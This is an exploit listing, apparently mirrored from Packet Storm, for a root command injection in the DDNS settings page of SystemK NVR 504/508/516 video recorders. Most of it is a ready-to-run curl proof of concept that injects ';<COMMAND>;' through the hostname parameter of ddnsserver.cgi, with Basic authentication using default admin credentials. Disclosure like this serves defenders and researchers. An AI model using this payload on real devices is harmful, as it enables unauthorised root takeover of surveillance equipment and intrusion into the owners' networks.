Share
## https://sploitus.com/exploit?id=PACKETSTORM:173005
# Exploit Title: SystemK NVR 504/508/516 Command Injection  
# Exploit Author: Keniver Wang  
# Publish Date: 19/06/2023  
# Date of found: 20/01/2021  
# Vendor: SystemK  
# Vendor Homepage: https://nvr.bz/  
# Version: NVR 504/508/516 2.3.5SK.30084998  
  
# Greets:  
Weber Tsai (CHT Security)  
  
# Description  
A Command Injection vulnerability in the DDNS Setting that allows  
attacker to execute arbitrary commands with root privileges.  
  
# Proof of Concept  
curl 'http://<IP>/ddnsserver.cgi?action=test&address=members.dyndns.org&type=dyndns&username=&password=&hostname=;<COMMAND>;&updatetime=300'  
\  
-X 'POST' \  
-H 'Connection: keep-alive' \  
-H 'Content-Length: 0' \  
-H 'Authorization: Basic YWRtaW46YWRtaW4=' \  
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko)' \  
-H 'Accept: */*' \  
-H 'Accept-Language: zh-TW,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6'